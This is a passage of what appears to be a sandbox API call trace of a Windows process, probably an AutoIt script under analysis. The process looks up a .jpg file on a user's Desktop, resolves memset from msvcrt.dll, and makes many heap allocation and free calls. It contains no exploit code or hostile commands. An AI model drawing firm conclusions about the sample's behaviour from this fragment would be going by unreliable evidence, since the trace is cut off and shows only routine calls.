lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg", lpFindFileData=0x61e858 | out: lpFindFileData=0x61e858*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb264fec0, ftCreationTime.dwHighDateTime=0x1d5ddb5, ftLastAccessTime.dwLowDateTime=0xf6077c70, ftLastAccessTime.dwHighDateTime=0x1d5e5fd, ftLastWriteTime.dwLowDateTime=0xf6077c70, ftLastWriteTime.dwHighDateTime=0x1d5e5fd, nFileSizeHigh=0x0, nFileSizeLow=0x13eeb, dwReserved0=0x0, dwReserved1=0x657690, cFileName="6F5BQoLL3Uym0CamPlpJ.jpg", cAlternateFileName="6F5BQO~1.JPG")) returned 0x6b89f8 [0076.185] FindClose (in: hFindFile=0x6b89f8 | out: hFindFile=0x6b89f8) returned 1 [0076.185] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0076.185] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0076.185] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e030 | out: hHeap=0x650000) returned 1 [0076.185] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0076.185] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.185] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0076.185] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0076.185] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0076.186] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0076.186] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0076.186] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0076.186] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0076.186] CharLowerBuffW (in: lpsz="byte[81643]", cchLength=0xb | out: lpsz="byte[81643]") returned 0xb [0076.186] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0076.186] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0076.186] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0076.186] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0076.186] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0076.186] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0076.187] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db80 | out: hHeap=0x650000) returned 1 [0076.187] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0076.187] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd10 | out: hHeap=0x650000) returned 1 [0076.187] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0076.187] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0c0 | out: hHeap=0x650000) returned 1 [0076.187] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e708 | out: hHeap=0x650000) returned 1 [0076.187] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da90 | out: hHeap=0x650000) returned 1 [0076.187] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0076.187] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0076.187] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0076.187] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68b450 | out: hHeap=0x650000) returned 1 [0076.187] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0076.187] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.187] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0076.187] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0076.187] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0076.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0076.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0076.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0076.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68b450 | out: hHeap=0x650000) returned 1 [0076.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0076.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0076.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd60 | out: hHeap=0x650000) returned 1 [0076.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0076.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0076.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0076.188] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0076.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0076.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0076.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0076.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0076.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0076.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0076.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0076.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df90 | out: hHeap=0x650000) returned 1 [0076.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0076.188] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0076.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e150 | out: hHeap=0x650000) returned 1 [0076.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0076.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e150 | out: hHeap=0x650000) returned 1 [0076.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0076.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0076.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0076.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0076.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0076.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e150 | out: hHeap=0x650000) returned 1 [0076.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0076.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e150 | out: hHeap=0x650000) returned 1 [0076.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0076.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0076.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0076.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0076.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0076.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e150 | out: hHeap=0x650000) returned 1 [0076.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0076.189] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76f90000 [0076.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0076.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x6bb3e8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0076.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0076.189] GetProcAddress (hModule=0x76f90000, lpProcName="memset") returned 0x76f99790 [0076.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e150 | out: hHeap=0x650000) returned 1 [0076.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0076.189] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df68 [0076.189] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb468 [0076.189] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3e8 [0076.189] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3d8 [0076.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0076.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0076.190] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.190] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df68 | out: hHeap=0x650000) returned 1 [0076.190] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3d8 [0076.190] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0076.190] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e150 [0076.190] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0076.190] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abf8 [0076.190] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e558 [0076.190] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3e8 [0076.190] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0076.190] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0076.190] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abf8 | out: hHeap=0x650000) returned 1 [0076.190] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abf8 [0076.190] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e558 [0076.190] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0076.190] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3e8 [0076.190] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0076.190] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0076.190] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0076.190] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e558 [0076.190] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0076.190] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0076.190] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3e8 [0076.190] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0076.190] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0076.190] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0076.190] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0076.190] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0076.190] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0076.191] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3e8 [0076.191] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0076.191] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0076.191] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0076.191] FreeLibrary (hLibModule=0x76f90000) returned 1 [0076.191] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0076.191] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0076.191] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0076.191] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dba8 | out: hHeap=0x650000) returned 1 [0076.191] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df90 | out: hHeap=0x650000) returned 1 [0076.191] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0076.191] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0076.191] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0076.191] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0076.191] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0076.191] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0076.191] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0076.191] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0076.191] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0076.191] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0076.191] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0076.191] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0076.191] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0076.191] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0076.191] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4f8 | out: hHeap=0x650000) returned 1 [0076.191] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6c0 | out: hHeap=0x650000) returned 1 [0076.191] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b588 | out: hHeap=0x650000) returned 1 [0076.191] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0076.191] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abf8 | out: hHeap=0x650000) returned 1 [0076.191] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0076.191] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.191] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0076.191] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x795ff8 [0076.191] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb428 [0076.192] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.192] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0076.192] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.192] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690770 [0076.192] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0076.192] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0076.192] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0076.192] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.192] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de50 [0076.192] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0076.192] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3d8 [0076.192] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6c0 [0076.192] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4f8 [0076.192] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb428 [0076.192] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.192] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0076.192] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0076.192] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0076.192] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb508 [0076.192] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.192] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0076.192] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0076.192] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e030 [0076.192] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb508 [0076.192] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.192] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0076.192] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0076.193] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac10 [0076.193] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb508 [0076.193] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.193] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0076.193] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0076.193] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e030 [0076.193] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb508 [0076.193] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.193] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0076.193] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0076.193] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0076.193] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb508 [0076.193] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.193] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0076.193] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0076.193] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e030 [0076.193] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb508 [0076.193] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.193] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0076.193] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.193] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0076.193] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.193] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.193] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.193] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0076.193] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0076.193] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0076.193] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb508 [0076.193] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.193] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0076.193] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0076.193] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e030 [0076.193] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb508 [0076.194] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.194] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0076.194] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0076.194] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0076.194] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb508 [0076.194] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.194] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0076.194] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0076.194] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e030 [0076.194] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb508 [0076.194] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.194] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0076.194] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0076.194] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb378 [0076.194] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e030 [0076.194] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 